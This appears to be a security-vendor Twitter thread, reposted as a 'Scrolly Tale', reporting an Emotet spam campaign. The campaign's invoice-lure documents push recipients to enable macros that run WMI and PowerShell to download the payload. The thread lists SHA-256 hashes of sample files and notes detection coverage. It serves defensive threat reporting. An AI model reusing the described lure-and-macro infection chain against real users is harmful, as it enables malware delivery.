One of biggest spam campaigns today is Emotet distributing malicious documents that use WMI to run a PowerShell script that downloads Emotet payload from 5 URLs. Emotet has been using this technique for a while; it might be proving effective as it’s still being actively used.
The campaign we saw today uses the typical “past due invoice” emails. The attachment is a document that says “You must have Office 365 admin permissions” to trick recipients to enable the macro, which then runs a WMI command to launch the PowerShell download code.
Office 365 ATP detects these documents attached to emails. On endpoints, Microsoft Defender ATP detects the documents and Emotet payloads using protections that are enriched by signals from Office 365 ATP. #signalsharing #machinelearning #MicrosoftThreatProtection @MicrosoftMTP
Sample WMI-utilizing document: SHA-256 1191fec079039583684a3d194de241773836ea73222ceb66e1573f32ac4a3482, d41ded2a8bc759c2b491fba4fc9f4f08a64ee30a801b57feeb046cea71de9fd1, d982e4f96dd03cb0cb736396c3a19e8d50ca59e9dc939010918b8eb0842e0729
Sample Emotet payloads in this campaign: SHA-256 07eab50c3ad374ed28472e5d362c27415b82928d844bc8a74addfdb3c88a1543, e1cff9857674b52f80a6f28ec52f5d1787779985ad63b530189b6dff39ca9d5b, a082cd89bfa5b0fe364d10874531b053d127580f4266bb6af5c037eeb0f47b93
Share this Scrolly Tale with your friends.
A Scrolly Tale is a new way to read Twitter threads with a more visually immersive experience.
Discover more beautiful Scrolly Tales like this.